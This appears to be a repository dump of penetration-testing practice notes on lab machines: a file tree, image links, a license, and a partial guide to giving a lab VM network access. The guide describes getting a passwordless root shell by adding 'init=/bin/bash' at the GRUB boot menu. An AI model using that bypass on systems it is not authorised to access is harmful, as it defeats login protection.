├── .gitattributes
├── FILES
│   ├── Cute
│   │   ├── img-20220725114624.png
│   │   ├── img-20220725114706.png
│   │   ├── img-20220725114756.png
│   │   ├── img-20220725114807.png
│   │   ├── img-20220725114835.png
│   │   ├── img-20220725114909.png
│   │   ├── img-20220725115146.png
│   │   ├── img-20220725115151.png
│   │   ├── img-20220725115318.png
│   │   ├── img-20220725115522.png
│   │   ├── img-20220725115525.png
│   │   └── img-20220725120352.png
│   ├── Development
│   │   ├── img-20220714120610.png
│   │   ├── img-20220714124045.png
│   │   ├── img-20220714124120.png
│   │   ├── img-20220714124121.png
│   │   ├── img-20220714124215.png
│   │   ├── img-20220714124217.png
│   │   ├── img-20220714124219.png
│   │   ├── img-20220714124258.png
│   │   ├── img-20220714124330.png
│   │   ├── img-20220714124420.png
│   │   ├── img-20220714124527.png
│   │   ├── img-20220714124608.png
│   │   ├── img-20220714124730.png
│   │   ├── img-20220714125022.png
│   │   ├── img-20220714125052.png
│   │   ├── img-20220714125114.png
│   │   ├── img-20220714125116.png
│   │   └── img-20220714125321.png
│   ├── FALL
│   │   ├── img-20220715111910.png
│   │   ├── img-20220715112000.png
│   │   ├── img-20220715112225.png
│   │   ├── img-20220715112425.png
│   │   ├── img-20220715115848.png
│   │   └── img-20220715120726.png
│   ├── Geisha
│   │   ├── img-20220814144430.png
│   │   ├── img-20220814145223.png
│   │   ├── img-20220814145410.png
│   │   ├── img-20220814145834.png
│   │   ├── img-20220814151251.png
│   │   ├── img-20220814151449.png
│   │   ├── img-20220814151604.png
│   │   ├── img-20220814151809.png
│   │   ├── img-20220814152427.png
│   │   ├── img-20220814153904.png
│   │   ├── img-20220814153958.png
│   │   ├── img-20220814154114.png
│   │   ├── img-20220814154256.png
│   │   ├── img-20220814154315.png
│   │   ├── img-20220814154442.png
│   │   ├── img-20220814154639.png
│   │   ├── img-20220814154715.png
│   │   └── img-20220814154741.png
│   ├── GetTargetIP
│   │   ├── img-20220723000210.png
│   │   ├── img-20220723000215.png
│   │   ├── img-20220723000415.png
│   │   ├── img-20220723000442.png
│   │   ├── img-20220723000518.png
│   │   ├── img-20220723000644.png
│   │   ├── img-20220723000852.png
│   │   └── img-20220723000932.png
│   ├── Joy
│   │   ├── img-20220714143305.png
│   │   ├── img-20220714143417.png
│   │   ├── img-20220714150445.png
│   │   └── img-20220714150525.png
│   ├── Seppuku
│   │   ├── img-20220804140410.png
│   │   ├── img-20220804140936.png
│   │   ├── img-20220804141143.png
│   │   ├── img-20220804142301.png
│   │   ├── img-20220804142456.png
│   │   ├── img-20220804143116.png
│   │   ├── img-20220804143357.png
│   │   ├── img-20220804144146.png
│   │   ├── img-20220804145128.png
│   │   ├── img-20220804145144.png
│   │   ├── img-20220804145459.png
│   │   └── img-20220804151603.png
│   ├── SkyTower
│   │   ├── img-20220712144724.png
│   │   ├── img-20220712144859.png
│   │   ├── img-20220712145008.png
│   │   ├── img-20220712145105.png
│   │   ├── img-20220712145316.png
│   │   ├── img-20220712145359.png
│   │   ├── img-20220712145858.png
│   │   └── img-20220712152044.png
│   ├── Tre
│   │   ├── img-20220801133805.png
│   │   ├── img-20220801133840.png
│   │   ├── img-20220801134225.png
│   │   ├── img-20220801134841.png
│   │   ├── img-20220801134849.png
│   │   ├── img-20220801135102.png
│   │   ├── img-20220801135134.png
│   │   ├── img-20220801135317.png
│   │   ├── img-20220801135419.png
│   │   ├── img-20220801135523.png
│   │   ├── img-20220801140010.png
│   │   ├── img-20220801140527.png
│   │   ├── img-20220801140536.png
│   │   ├── img-20220801140546.png
│   │   ├── img-20220801144836.png
│   │   ├── img-20220801144900.png
│   │   ├── img-20220801144935.png
│   │   ├── img-20220801145052.png
│   │   ├── img-20220801153305.png
│   │   ├── img-20220801160911.png
│   │   ├── img-20220801162854.png
│   │   ├── img-20220801162856.png
│   │   └── img-20220801163035.png
│   ├── decoy
│   │   ├── img-20220729120054.png
│   │   └── img-20220729120137.png
│   ├── inclusiveness
│   │   ├── img-20220814193612.png
│   │   ├── img-20220814193752.png
│   │   ├── img-20220814193827.png
│   │   ├── img-20220814194154.png
│   │   ├── img-20220814194223.png
│   │   ├── img-20220814194443.png
│   │   ├── img-20220814194510.png
│   │   ├── img-20220814194711.png
│   │   ├── img-20220814194807.png
│   │   ├── img-20220814194920.png
│   │   ├── img-20220814195112.png
│   │   ├── img-20220814195311.png
│   │   ├── img-20220814195433.png
│   │   ├── img-20220814200330.png
│   │   └── img-20220814200354.png
│   ├── lampiao
│   │   ├── img-20220722104218.png
│   │   ├── img-20220722104516.png
│   │   ├── img-20220722105052.png
│   │   ├── img-20220722105436.png
│   │   ├── img-20220722105459.png
│   │   └── img-20220722114259.png
│   ├── loly
│   │   ├── img-20220726145442.png
│   │   ├── img-20220726145510.png
│   │   ├── img-20220726150651.png
│   │   ├── img-20220726152243.png
│   │   ├── img-20220726155031.png
│   │   ├── img-20220726155119.png
│   │   ├── img-20220726155156.png
│   │   └── img-20220726162146.png
│   ├── natraj
│   │   ├── img-20220721123139.png
│   │   ├── img-20220721123154.png
│   │   ├── img-20220721123732.png
│   │   ├── img-20220721124057.png
│   │   ├── img-20220721124220.png
│   │   ├── img-20220721133323.png
│   │   ├── img-20220721133722.png
│   │   ├── img-20220721135431.png
│   │   ├── img-20220721145834.png
│   │   ├── img-20220721150028.png
│   │   └── img-20220721150030.png
│   ├── oscp
│   │   ├── img-20220802104846.png
│   │   ├── img-20220802110852.png
│   │   ├── img-20220802111031.png
│   │   ├── img-20220802111043.png
│   │   ├── img-20220802111146.png
│   │   ├── img-20220802111234.png
│   │   ├── img-20220802111814.png
│   │   ├── img-20220802111936.png
│   │   ├── img-20220802112225.png
│   │   ├── img-20220802112913.png
│   │   ├── img-20220802114434.png
│   │   ├── img-20220802114640.png
│   │   ├── img-20220802114653.png
│   │   ├── img-20220802114820.png
│   │   └── img-20220802120047.png
│   ├── photographer
│   │   ├── img-20220814162851.png
│   │   ├── img-20220814163238.png
│   │   ├── img-20220814163242.png
│   │   ├── img-20220814164633.png
│   │   ├── img-20220814164733.png
│   │   ├── img-20220814164817.png
│   │   ├── img-20220814164834.png
│   │   ├── img-20220814164900.png
│   │   ├── img-20220814164928.png
│   │   ├── img-20220814165024.png
│   │   ├── img-20220814165123.png
│   │   ├── img-20220814165254.png
│   │   ├── img-20220814170640.png
│   │   ├── img-20220814170846.png
│   │   ├── img-20220814170934.png
│   │   ├── img-20220814171532.png
│   │   ├── img-20220814172034.png
│   │   └── img-20220814172119.png
│   ├── potato
│   │   ├── img-20220729153811.png
│   │   ├── img-20220729153814.png
│   │   ├── img-20220729154016.png
│   │   ├── img-20220729154958.png
│   │   ├── img-20220729160517.png
│   │   ├── img-20220729160645.png
│   │   ├── img-20220729160750.png
│   │   ├── img-20220729161328.png
│   │   ├── img-20220729161341.png
│   │   ├── img-20220729161351.png
│   │   ├── img-20220729161404.png
│   │   ├── img-20220729161413.png
│   │   ├── img-20220729161419.png
│   │   ├── img-20220729161432.png
│   │   ├── img-20220729162150.png
│   │   ├── img-20220729163028.png
│   │   └── img-20220729163655.png
│   ├── sar
│   │   ├── img-20220721113820.png
│   │   ├── img-20220721113828.png
│   │   ├── img-20220721114624.png
│   │   ├── img-20220721114631.png
│   │   ├── img-20220721114822.png
│   │   └── img-20220721114914.png
│   ├── solstice
│   │   ├── img-20220722171238.png
│   │   ├── img-20220722171520.png
│   │   └── img-20220722174117.png
│   └── wpwnvm
│       ├── img-20220814173522.png
│       ├── img-20220814173742.png
│       ├── img-20220814175756.png
│       ├── img-20220814175833.png
│       ├── img-20220814181711.png
│       ├── img-20220814182138.png
│       ├── img-20220814182653.png
│       ├── img-20220814182655.png
│       ├── img-20220814182827.png
│       └── img-20220814182845.png
├── LICENSE
├── Other Documents
│   ├── GetTargetIP.md
│   ├── OSCP-Exam-Report-Template.docx
│   └── usually_command.md
├── README.md
├── Target Notes-English Version
│   ├── .DS_Store
│   ├── Cute.md
│   ├── Development.md
│   ├── FALL.md
│   ├── Joy.md
│   ├── decoy.md
│   └── lampiao.md
└── Target Notes
    ├── Cute.md
    ├── Development.md
    ├── FALL.md
    ├── Geisha.md
    ├── Joy.md
    ├── Seppuku.md
    ├── SkyTower.md
    ├── Tre.md
    ├── decoy.md
    ├── inclusiveness.md
    ├── lampiao.md
    ├── loly.md
    ├── natraj.md
    ├── oscp.md
    ├── photographer.md
    ├── potato.md
    ├── sar.md
    ├── solstice.md
    └── wpwnvm.md

/.gitattributes:
--------------------------------------------------------------------------------
# Auto detect text files and perform LF normalization
* text=auto
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801134849.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801135102.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801135102.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801135134.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801135134.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801135317.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801135317.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801135419.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801135419.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801135523.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801135523.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801140010.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801140010.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801140527.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801140527.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801140536.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801140536.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801140546.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801140546.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801144836.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801144836.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801144900.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801144900.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801144935.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801144935.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801145052.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801145052.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801153305.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801153305.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801160911.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801160911.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801162854.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801162854.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801162856.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801162856.png -------------------------------------------------------------------------------- /FILES/Tre/img-20220801163035.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/Tre/img-20220801163035.png -------------------------------------------------------------------------------- /FILES/decoy/img-20220729120054.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/decoy/img-20220729120054.png -------------------------------------------------------------------------------- /FILES/decoy/img-20220729120137.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/decoy/img-20220729120137.png -------------------------------------------------------------------------------- /FILES/inclusiveness/img-20220814193612.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/inclusiveness/img-20220814193612.png -------------------------------------------------------------------------------- /FILES/inclusiveness/img-20220814193752.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/inclusiveness/img-20220814193752.png -------------------------------------------------------------------------------- /FILES/inclusiveness/img-20220814193827.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/inclusiveness/img-20220814193827.png -------------------------------------------------------------------------------- /FILES/inclusiveness/img-20220814194154.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/inclusiveness/img-20220814194154.png -------------------------------------------------------------------------------- /FILES/inclusiveness/img-20220814194223.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/inclusiveness/img-20220814194223.png -------------------------------------------------------------------------------- /FILES/inclusiveness/img-20220814194443.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/inclusiveness/img-20220814194443.png -------------------------------------------------------------------------------- /FILES/inclusiveness/img-20220814194510.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/inclusiveness/img-20220814194510.png -------------------------------------------------------------------------------- /FILES/inclusiveness/img-20220814194711.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/inclusiveness/img-20220814194711.png -------------------------------------------------------------------------------- /FILES/inclusiveness/img-20220814194807.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/inclusiveness/img-20220814194807.png 
-------------------------------------------------------------------------------- /FILES/inclusiveness/img-20220814194920.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/inclusiveness/img-20220814194920.png -------------------------------------------------------------------------------- /FILES/inclusiveness/img-20220814195112.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/inclusiveness/img-20220814195112.png -------------------------------------------------------------------------------- /FILES/inclusiveness/img-20220814195311.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/inclusiveness/img-20220814195311.png -------------------------------------------------------------------------------- /FILES/inclusiveness/img-20220814195433.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/inclusiveness/img-20220814195433.png -------------------------------------------------------------------------------- /FILES/inclusiveness/img-20220814200330.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/inclusiveness/img-20220814200330.png -------------------------------------------------------------------------------- /FILES/inclusiveness/img-20220814200354.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/inclusiveness/img-20220814200354.png -------------------------------------------------------------------------------- /FILES/lampiao/img-20220722104218.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/lampiao/img-20220722104218.png -------------------------------------------------------------------------------- /FILES/lampiao/img-20220722104516.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/lampiao/img-20220722104516.png -------------------------------------------------------------------------------- /FILES/lampiao/img-20220722105052.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/lampiao/img-20220722105052.png -------------------------------------------------------------------------------- /FILES/lampiao/img-20220722105436.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/lampiao/img-20220722105436.png -------------------------------------------------------------------------------- /FILES/lampiao/img-20220722105459.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/lampiao/img-20220722105459.png -------------------------------------------------------------------------------- /FILES/lampiao/img-20220722114259.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/lampiao/img-20220722114259.png -------------------------------------------------------------------------------- /FILES/loly/img-20220726145442.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/loly/img-20220726145442.png -------------------------------------------------------------------------------- /FILES/loly/img-20220726145510.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/loly/img-20220726145510.png -------------------------------------------------------------------------------- /FILES/loly/img-20220726150651.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/loly/img-20220726150651.png -------------------------------------------------------------------------------- /FILES/loly/img-20220726152243.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/loly/img-20220726152243.png -------------------------------------------------------------------------------- /FILES/loly/img-20220726155031.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/loly/img-20220726155031.png -------------------------------------------------------------------------------- /FILES/loly/img-20220726155119.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/loly/img-20220726155119.png -------------------------------------------------------------------------------- /FILES/loly/img-20220726155156.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/loly/img-20220726155156.png -------------------------------------------------------------------------------- /FILES/loly/img-20220726162146.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/loly/img-20220726162146.png -------------------------------------------------------------------------------- /FILES/natraj/img-20220721123139.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/natraj/img-20220721123139.png -------------------------------------------------------------------------------- /FILES/natraj/img-20220721123154.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/natraj/img-20220721123154.png -------------------------------------------------------------------------------- /FILES/natraj/img-20220721123732.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/natraj/img-20220721123732.png -------------------------------------------------------------------------------- /FILES/natraj/img-20220721124057.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/natraj/img-20220721124057.png -------------------------------------------------------------------------------- /FILES/natraj/img-20220721124220.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/natraj/img-20220721124220.png -------------------------------------------------------------------------------- /FILES/natraj/img-20220721133323.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/natraj/img-20220721133323.png -------------------------------------------------------------------------------- /FILES/natraj/img-20220721133722.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/natraj/img-20220721133722.png -------------------------------------------------------------------------------- /FILES/natraj/img-20220721135431.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/natraj/img-20220721135431.png -------------------------------------------------------------------------------- /FILES/natraj/img-20220721145834.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/natraj/img-20220721145834.png -------------------------------------------------------------------------------- /FILES/natraj/img-20220721150028.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/natraj/img-20220721150028.png -------------------------------------------------------------------------------- /FILES/natraj/img-20220721150030.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/natraj/img-20220721150030.png -------------------------------------------------------------------------------- /FILES/oscp/img-20220802104846.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/oscp/img-20220802104846.png -------------------------------------------------------------------------------- /FILES/oscp/img-20220802110852.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/oscp/img-20220802110852.png -------------------------------------------------------------------------------- /FILES/oscp/img-20220802111031.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/oscp/img-20220802111031.png -------------------------------------------------------------------------------- /FILES/oscp/img-20220802111043.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/oscp/img-20220802111043.png -------------------------------------------------------------------------------- /FILES/oscp/img-20220802111146.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/oscp/img-20220802111146.png -------------------------------------------------------------------------------- /FILES/oscp/img-20220802111234.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/oscp/img-20220802111234.png -------------------------------------------------------------------------------- /FILES/oscp/img-20220802111814.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/oscp/img-20220802111814.png -------------------------------------------------------------------------------- /FILES/oscp/img-20220802111936.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/oscp/img-20220802111936.png -------------------------------------------------------------------------------- /FILES/oscp/img-20220802112225.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/oscp/img-20220802112225.png -------------------------------------------------------------------------------- /FILES/oscp/img-20220802112913.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/oscp/img-20220802112913.png -------------------------------------------------------------------------------- /FILES/oscp/img-20220802114434.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/oscp/img-20220802114434.png -------------------------------------------------------------------------------- /FILES/oscp/img-20220802114640.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/oscp/img-20220802114640.png -------------------------------------------------------------------------------- /FILES/oscp/img-20220802114653.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/oscp/img-20220802114653.png -------------------------------------------------------------------------------- /FILES/oscp/img-20220802114820.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/oscp/img-20220802114820.png -------------------------------------------------------------------------------- /FILES/oscp/img-20220802120047.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/oscp/img-20220802120047.png -------------------------------------------------------------------------------- /FILES/photographer/img-20220814162851.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/photographer/img-20220814162851.png -------------------------------------------------------------------------------- /FILES/photographer/img-20220814163238.png: -------------------------------------------------------------------------------- 
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2022 Aaron

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/Other Documents/GetTargetIP.md:
--------------------------------------------------------------------------------
# Fix for a target VM that cannot obtain an IP address

1. Boot the Linux VM and press `e` when the GRUB boot menu appears.
   ![Img](../FILES/GetTargetIP/img-20220723000210.png)
   ![Img](../FILES/GetTargetIP/img-20220723000215.png)

2. Find the line that begins with `linux` and change its parameters:
   - There are two cases: the line either has no `ro`, or it has `ro`.
   - If `ro` is present, change it to `rw`.
   - If there is no `ro`, append `rw` at the end of the line.
   - Then append `init=/bin/bash`.

   As shown below 😁
   ![Img](../FILES/GetTargetIP/img-20220723000415.png)

3. Press Ctrl+X to boot with these parameters; you land in a root single-user shell.
   ![Img](../FILES/GetTargetIP/img-20220723000442.png)

4. Run `ip a` to list the network interfaces. Here it is `ens33`; use whatever your machine actually shows.
   ![Img](../FILES/GetTargetIP/img-20220723000518.png)

5. Edit the interface configuration with `vi /etc/network/interfaces`:
   - If step 2 was not completed the file cannot be modified, because the root filesystem is still mounted read-only.
   - Change the interface keyword from `allow-hotplug` to `auto`.
   - For easy identification I added entries for all of eth0, eth1 and ens33.
   ![Img](../FILES/GetTargetIP/img-20220723000644.png)
   ```
   auto eth0
   iface eth0 inet dhcp
